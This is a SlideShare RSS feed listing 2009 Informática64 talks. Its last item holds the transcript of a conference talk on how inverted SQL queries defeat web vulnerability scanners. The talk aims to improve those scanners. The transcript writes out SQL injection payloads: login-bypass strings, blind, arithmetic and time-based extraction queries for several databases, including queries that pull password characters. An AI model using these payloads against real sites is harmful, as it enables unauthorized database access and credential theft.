        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>Metadata Security: MetaShield Protector</title>
      <link>http://www.slideshare.net/chemai64/metadata-security-metashield-protector</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo04metashieldchema-091212022335-phpapp01-thumbnail-2?1260607929" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Chema Alonso, de Informática64, durante el SIMO Network 2009.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo04metashieldchema-091212022335-phpapp01-thumbnail-2?1260607929" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Chema Alonso, de Informática64, durante el SIMO Network 2009.]]>
      </content:encoded>
      <pubDate>Sat, 12 Dec 2009 08:23:11 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/metadata-security-metashield-protector</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/metadata-security-metashield-protector"/>
        <media:title>Metadata Security: MetaShield Protector</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Sesi&#243;n impartida por Chema Alonso, de Inform&#225;tica64, durante el SIMO Network 2009.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/simo04metashieldchema-091212022335-phpapp01-thumbnail-2?1260607929&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Sesi&#243;n impartida por Chema Alonso, de Inform&#225;tica64, durante el SIMO Network 2009.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/simo04metashieldchema-091212022335-phpapp01-thumbnail-2?1260607929" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:425px;text-align:left" id="__ss_2703153"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/metadata-security-metashield-protector" title="Metadata Security: MetaShield Protector">Metadata Security: MetaShield Protector</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo04metashieldchema-091212022335-phpapp01&stripped_title=metadata-security-metashield-protector" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo04metashieldchema-091212022335-phpapp01&stripped_title=metadata-security-metashield-protector" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>61</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/simo04metashieldchema-091212022335-phpapp01-thumbnail-2?1260607929</slideshare:thumbnail>
        <slideshare:type>presentation</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>Windows Server 2008 &amp;amp; Windows 7</title>
      <link>http://www.slideshare.net/chemai64/windows-server-2008-windows-7</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo03escritorioremotojulin-091212022611-phpapp02-thumbnail-2?1260606439" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Julián Blázquez, de Informática64, durante el SIMO Network 2009.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo03escritorioremotojulin-091212022611-phpapp02-thumbnail-2?1260606439" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Julián Blázquez, de Informática64, durante el SIMO Network 2009.]]>
      </content:encoded>
      <pubDate>Sat, 12 Dec 2009 08:22:23 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/windows-server-2008-windows-7</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/windows-server-2008-windows-7"/>
        <media:title>Windows Server 2008 &amp;amp; Windows 7</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Sesi&#243;n impartida por Juli&#225;n Bl&#225;zquez, de Inform&#225;tica64, durante el SIMO Network 2009.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/simo03escritorioremotojulin-091212022611-phpapp02-thumbnail-2?1260606439&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Sesi&#243;n impartida por Juli&#225;n Bl&#225;zquez, de Inform&#225;tica64, durante el SIMO Network 2009.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/simo03escritorioremotojulin-091212022611-phpapp02-thumbnail-2?1260606439" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:425px;text-align:left" id="__ss_2703152"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/windows-server-2008-windows-7" title="Windows Server 2008 &amp; Windows 7">Windows Server 2008 &amp; Windows 7</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo03escritorioremotojulin-091212022611-phpapp02&stripped_title=windows-server-2008-windows-7" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo03escritorioremotojulin-091212022611-phpapp02&stripped_title=windows-server-2008-windows-7" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>112</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/simo03escritorioremotojulin-091212022611-phpapp02-thumbnail-2?1260606439</slideshare:thumbnail>
        <slideshare:type>presentation</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>Windows Server 2008 R2 Brand Cache</title>
      <link>http://www.slideshare.net/chemai64/windows-server-2008-r2-brand-cache</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo02branchcachejulin-091212022241-phpapp01-thumbnail-2?1260607135" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Julián Blázquez, de Informática64, durante el SIMO Network 2009.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo02branchcachejulin-091212022241-phpapp01-thumbnail-2?1260607135" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Julián Blázquez, de Informática64, durante el SIMO Network 2009.]]>
      </content:encoded>
      <pubDate>Sat, 12 Dec 2009 08:21:26 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/windows-server-2008-r2-brand-cache</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/windows-server-2008-r2-brand-cache"/>
        <media:title>Windows Server 2008 R2 Brand Cache</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Sesi&#243;n impartida por Juli&#225;n Bl&#225;zquez, de Inform&#225;tica64, durante el SIMO Network 2009.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/simo02branchcachejulin-091212022241-phpapp01-thumbnail-2?1260607135&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Sesi&#243;n impartida por Juli&#225;n Bl&#225;zquez, de Inform&#225;tica64, durante el SIMO Network 2009.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/simo02branchcachejulin-091212022241-phpapp01-thumbnail-2?1260607135" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:425px;text-align:left" id="__ss_2703150"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/windows-server-2008-r2-brand-cache" title="Windows Server 2008 R2 Brand Cache">Windows Server 2008 R2 Brand Cache</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo02branchcachejulin-091212022241-phpapp01&stripped_title=windows-server-2008-r2-brand-cache" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo02branchcachejulin-091212022241-phpapp01&stripped_title=windows-server-2008-r2-brand-cache" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>89</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/simo02branchcachejulin-091212022241-phpapp01-thumbnail-2?1260607135</slideshare:thumbnail>
        <slideshare:type>presentation</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>No Lusers  Volumen II</title>
      <link>http://www.slideshare.net/chemai64/no-lusers-volumen-ii-2580371</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/nolusers2-091125032818-phpapp02-thumbnail-2?1259141328" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Volumen II de las tiras de No Lusers explicadas por el autor para que puedas entender todos los chistes malos. Sí, ya lo sé, si un chiste es malo, no veas tú encima cuando intentas explicarlo.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/nolusers2-091125032818-phpapp02-thumbnail-2?1259141328" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Volumen II de las tiras de No Lusers explicadas por el autor para que puedas entender todos los chistes malos. Sí, ya lo sé, si un chiste es malo, no veas tú encima cuando intentas explicarlo.]]>
      </content:encoded>
      <pubDate>Wed, 25 Nov 2009 09:28:16 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/no-lusers-volumen-ii-2580371</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/no-lusers-volumen-ii-2580371"/>
        <media:title>No Lusers  Volumen II</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Volumen II de las tiras de No Lusers explicadas por el autor para que puedas entender todos los chistes malos. S&#237;, ya lo s&#233;, si un chiste es malo, no veas t&#250; encima cuando intentas explicarlo.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/nolusers2-091125032818-phpapp02-thumbnail-2?1259141328&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Volumen II de las tiras de No Lusers explicadas por el autor para que puedas entender todos los chistes malos. S&#237;, ya lo s&#233;, si un chiste es malo, no veas t&#250; encima cuando intentas explicarlo.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/nolusers2-091125032818-phpapp02-thumbnail-2?1259141328" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:477px;text-align:left" id="__ss_2580371"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/no-lusers-volumen-ii-2580371" title="No Lusers  Volumen II">No Lusers  Volumen II</a><object style="margin:0px" width="477" height="510"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayerd.swf?doc=nolusers2-091125032818-phpapp02&stripped_title=no-lusers-volumen-ii-2580371" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayerd.swf?doc=nolusers2-091125032818-phpapp02&stripped_title=no-lusers-volumen-ii-2580371" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="477" height="510"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">documents</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>288</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/nolusers2-091125032818-phpapp02-thumbnail-2?1259141328</slideshare:thumbnail>
        <slideshare:type>document</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>No Lusers Volumen I</title>
      <link>http://www.slideshare.net/chemai64/no-lusers-volumen-i</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/nolusers1-091122042943-phpapp02-thumbnail-2?1259138700" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Volumen I de las tiras de No Lusers explicadas por el autor para que puedas entender todos los chistes malos. Sí, ya lo sé, si un chiste es malo, no veas tú encima cunado intentas explicarlo.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/nolusers1-091122042943-phpapp02-thumbnail-2?1259138700" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Volumen I de las tiras de No Lusers explicadas por el autor para que puedas entender todos los chistes malos. Sí, ya lo sé, si un chiste es malo, no veas tú encima cunado intentas explicarlo.]]>
      </content:encoded>
      <pubDate>Sun, 22 Nov 2009 10:29:38 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/no-lusers-volumen-i</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/no-lusers-volumen-i"/>
        <media:title>No Lusers Volumen I</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Volumen I de las tiras de No Lusers explicadas por el autor para que puedas entender todos los chistes malos. S&#237;, ya lo s&#233;, si un chiste es malo, no veas t&#250; encima cunado intentas explicarlo.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/nolusers1-091122042943-phpapp02-thumbnail-2?1259138700&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Volumen I de las tiras de No Lusers explicadas por el autor para que puedas entender todos los chistes malos. S&#237;, ya lo s&#233;, si un chiste es malo, no veas t&#250; encima cunado intentas explicarlo.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/nolusers1-091122042943-phpapp02-thumbnail-2?1259138700" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:477px;text-align:left" id="__ss_2557478"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/no-lusers-volumen-i" title="No Lusers Volumen I">No Lusers Volumen I</a><object style="margin:0px" width="477" height="510"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayerd.swf?doc=nolusers1-091122042943-phpapp02&stripped_title=no-lusers-volumen-i" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayerd.swf?doc=nolusers1-091122042943-phpapp02&stripped_title=no-lusers-volumen-i" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="477" height="510"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">documents</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>539</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/nolusers1-091122042943-phpapp02-thumbnail-2?1259138700</slideshare:thumbnail>
        <slideshare:type>document</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>No Lusers Volumen II</title>
      <link>http://www.slideshare.net/chemai64/no-lusers-volumen-ii</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/nolusers2-091122042934-phpapp02-thumbnail-2?1259139902" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Volumen II de las tiras de No Lusers explicadas por el autor para que puedas entender todos los chistes malos. Sí, ya lo sé, si un chiste es malo, no veas tú encima cuando intentas explicarlo.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/nolusers2-091122042934-phpapp02-thumbnail-2?1259139902" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Volumen II de las tiras de No Lusers explicadas por el autor para que puedas entender todos los chistes malos. Sí, ya lo sé, si un chiste es malo, no veas tú encima cuando intentas explicarlo.]]>
      </content:encoded>
      <pubDate>Sun, 22 Nov 2009 10:29:28 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/no-lusers-volumen-ii</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/no-lusers-volumen-ii"/>
        <media:title>No Lusers Volumen II</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Volumen II de las tiras de No Lusers explicadas por el autor para que puedas entender todos los chistes malos. S&#237;, ya lo s&#233;, si un chiste es malo, no veas t&#250; encima cuando intentas explicarlo.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/nolusers2-091122042934-phpapp02-thumbnail-2?1259139902&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Volumen II de las tiras de No Lusers explicadas por el autor para que puedas entender todos los chistes malos. S&#237;, ya lo s&#233;, si un chiste es malo, no veas t&#250; encima cuando intentas explicarlo.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/nolusers2-091122042934-phpapp02-thumbnail-2?1259139902" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:477px;text-align:left" id="__ss_2557477"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/no-lusers-volumen-ii" title="No Lusers Volumen II">No Lusers Volumen II</a><object style="margin:0px" width="477" height="510"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayerd.swf?doc=nolusers2-091122042934-phpapp02&stripped_title=no-lusers-volumen-ii" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayerd.swf?doc=nolusers2-091122042934-phpapp02&stripped_title=no-lusers-volumen-ii" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="477" height="510"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">documents</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>43</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/nolusers2-091122042934-phpapp02-thumbnail-2?1259139902</slideshare:thumbnail>
        <slideshare:type>document</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>How &amp;quot;&#183;$% developers defeat the web vulnerability scanners</title>
      <link>http://www.slideshare.net/chemai64/how-developers-defeat-the-web-vulnerability-scanners-2546881</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/confidence2009public-091120104250-phpapp01-thumbnail-2?1258735439" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Share Favorite 
Favorited X 
Download More... 
Favorited! Want to add tags? Have an opinion? Make a quick comment as well.  Cancel  
Edit your favorites  Cancel  
Send to your Group / Event Select Group / Event   
Add your message  Cancel   
Post toBlogger WordPress Twitter Facebook Deliciousmore share options .Embed  For WordPress.com 
 
Without related presentations 
 
0 commentsPost a comment 

Post a comment
 .. 
Embed Video  Subscribe to follow-up comments Unsubscribe from followup comments .  
Edit your comment  Cancel  .Notes on slide 1
no notes for slide #1

no notes for slide #1
..Favorites, Groups &amp; Events
more
How &quot;·$% developers defeat the web vulnerability scanners - Presentation Transcript
1.How ?¿$·&amp; developers defeat the most famous web vulnerability scanners …or how to recognize old friends Chema Alonso Informática64 José Parada Microsoft Ibérica 
2.Agenda 
1.- Introduction 
2.- Inverted Queries 
3.- Arithmetic Blind SQL Injection 
4.- Time-Based Blind SQL Injection using Heavey Queries 
5.- Conclusions 
3.1.-Introduction 
4.SQL Injection is still here among us 
5.Web Application Security Consortium: Comparision http://projects.webappsec.org/Web-Application-Security-Statistics 12.186 sites 97.554 bugs 
6.Need to Improve Automatic Scanning 
Not always a manual scanning is possible 
Time 
Confidentiality 
Money, money, money… 
Need to study new ways to recognize old fashion vulnerabilities to improve automatic scanning tools. 
7.2.-Inverted Queries 
8. 
9.Homers, how are they? 
Lazy 
Bad trainined 
Poor Experience in security stuff 
Don´t like working 
Don´t like computing 
Don´t like coding 
Don´t like you! 
10.Flanders are Left-handed 
11.Right 
SELECT UID 
FROM USERS 
WHERE NAME=‘V_NAME’ 
AND 
PASSWORD=‘V_PASSW’; 
12.Wrong? 
SELECT UID 
FROM USERS 
WHERE ‘V_NAME’=NAME AND 
‘ V_PASSW’=PASSWORD 
13.Login Inverted Query 
Select uid 
From users where ‘v_name’=name and ‘v_pass’=password 
http://www.web.com/login.php?v_name=Robert&amp;v_pass=Kubica’ or &amp;apos;1&amp;apos;=&amp;apos;1 
Select uid 
From users where ‘Robert’=name and ‘Kubica’ or ‘1’=‘1’=password 
 FAIL 
14.Login Inverted SQL Injection an example 
Select uid 
From users where ‘v_name’=name and ‘v_pass’=password 
http://www.web.com/login.php?v_name=Robert&amp;v_pass=’=‘’ or ‘1’=‘1’ or ‘Kubica 
Select uid 
From users where ‘Robert’=name and ’’=‘’ or ‘1’=‘1’ or ‘Kubica’=password 
 Success 
15.Blind Attacks 
Attacker injects code but can´t access directly to the data. 
However this injection changes the behavior of the web application. 
Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. 
Blind SQL Injection 
Biind Xpath Injection 
Blind LDAP Injection 
16.Blind SQL Injection Attacks 
Attacker injects: 
“ True where clauses” 
“ False where clauses“ 
Ex: 
Program.php?id=1 and 1=1 
Program.php?id=1 and 1=2 
Program doesn’t return any visible data from database or data in error messages. 
The attacker can´t see any data extracted from the database. 
17.Blind SQL Injection Attacks 
Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”: 
Different hashes 
Different html structure 
Different patterns (keywords) 
Different linear ASCII sums 
“ Different behavior” 
By example: Response Time 
18.Blind SQL Injection Attacks 
If any difference exists, then: 
Attacker can extract all information from database 
How? Using “booleanization” 
MySQL: 
Program.php?id=1 and 100&gt;(ASCII(Substring(user(),1,1))) 
“ True-Answer Page” or “False-Answer Page”? 
MSSQL: 
Program.php?id=1 and 100&gt;(Select top 1 ASCII(Substring(name,1,1))) from sysusers) 
Oracle: 
Program.php?id=1 and 100&gt;(Select ASCII(Substr(username,1,1))) from all_users where rownum&amp;lt;=1) 
19.Blind Inverted Query 
Select product 
From products 
Where v_value=id; 
http://www.web.com/products.php?v_value= 2 and 1=1 
Select product 
From products 
Where 2 and 1=1=id; 
-&gt; FAIL 
20.The MySQL Case 
1 is True 
1=1=1 -&gt;True 
1=1=(1+1-1)=abs(1)=1 -&gt; True 
2=2=2 -&gt;False 
-&gt; 2=2 becomes True -&gt; True=2 
-&gt; True is equals to 1 then 1=2 is False 
Select product 
From products 
Where v_value=id; 
http://www.web.com/products.php?v_value= 1 and 1=1 
Select product 
From products 
Where 1 and 1=1=id; 
-&gt; SUCCES (if there is a Id=1) 
21.Web Scanner behaviors 
Acunetix 
Paros 
AppScan 
W3af 
Wapiti 
Proxy Strike 
22.Acunetix &amp; Homer 
23.Acunetix &amp; Flanders 
24.AppScan &amp; Homer 
25.AppScan &amp; Flanders 
26.Paros &amp; Homer 
27.Paros &amp; Flanders 
28.W3af &amp; Homer 
29.W3af &amp; Flanders 
30.Wapiti &amp; Homer 
31.Wapiti &amp; Flanders 
32.Demo 
W3af 
Wapiti 
Proxy Strike 
33.Results   Normal Inverted   MySQL MS SQL Server MySQL MS SQL Server   Numeric String Numeric String Numeric String Numeric String Paros                 AppScan                 Acunetix                 w3af                 wapiti                 Proxy Strike                 
34.In the end… 
OUCH!!! 
Thank God for keep me safe 
35.Solutions? 
Concat string injection 
Arithmetic Blind SQL Injection 
Time-Based Blind SQL injection 
Delay Functions 
Heavy queries 
36.3.- Arithmetic 
37.What about this queries? 
How to detect/exploit this Blind SQLinjection vulnerability? 
The query forces the parameter to be numeric 
SELECT field FROM table WHERE id=abs( param ) 
Ex: 
Get Param( ID ) 
Select ….. Where att1=abs( ID ) 
Select ….. Where att2=k1- ID 
Print response 
Not AND or OR operators can be used. 
Boolean logic needs to be created with math operations 
38.Arithmetic Blind SQL Injection 
Divide by zero (David Litchfield) 
Id=A+(1/(ASCII(B)-C)) 
A-&gt; Param value originally used in the query. 
B -&gt; Value we are searching for, e.g.: Substring(passwd,1,1) 
C-&gt; Counter [0..255] 
TRUE: When ASCII(B)=C, the DB will generate a divide by zero exception. 
39.Arithmetic Blind SQL Injection 
Sums and subtractions 
Id=A+ASCII(B)-C 
A-&gt; Param value originally used in the query. 
B -&gt; Value we are searching for, e.g.: Substring(passwd,1,1) 
C-&gt; Counter [0..255] 
When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A 
40.Arithmetic Blind SQL Injection 
Value type overflow 
Id=A+((C/ASCII(B))*(K)) 
A-&gt; Param value originally used in the query. 
B -&gt; Value we are searching for, e.g.: Substring(passwd,1,1) 
C-&gt; Counter [0..255] 
K-&gt; Value that overflows the type defined for A 
(e.g. if A is integer, then K=2^ 32 ) 
When C/ASCII(B)==1, K*1 overflows the data type 
41.Demo: 
Divide by zero 
Sums and subtractions 
Integer overflow 
42.Conclusions 
Arithmetic Blind SQL Injection allows to construct binary logic without “AND” and “OR”. 
detects bugs in this kind of queries… 
And also in Inverted queries in which a numeric value is used 
Almost none of the vulnerability scanners are using this method 
43.4.-Time-based Blind SQL Injection using heavy queries 
44.Time-Based Blind SQL Injection 
In scenarios with no differences between “True-Answer Page” and “False-Answer Page”, time delays can be used. 
Injection forces a delay in the response page when the condition injected is True. 
- Delay functions: 
SQL Server: waitfor 
Oracle: dbms_lock.sleep 
MySQL: sleep or Benchmark Function 
Postgres: pg_sleep 
Ex: 
; if (exists(select * from users)) waitfor delay &amp;apos;0:0:5’ 
45.Time-Based Blind SQL Injection 
What about DBs without delay functions, i.e.: 
Oracle connections MS Access DB2 
without PL/SQL injection 
Can we still perform an exploitation of Time-Based Blind SQL Injection Attacks? 
46. 
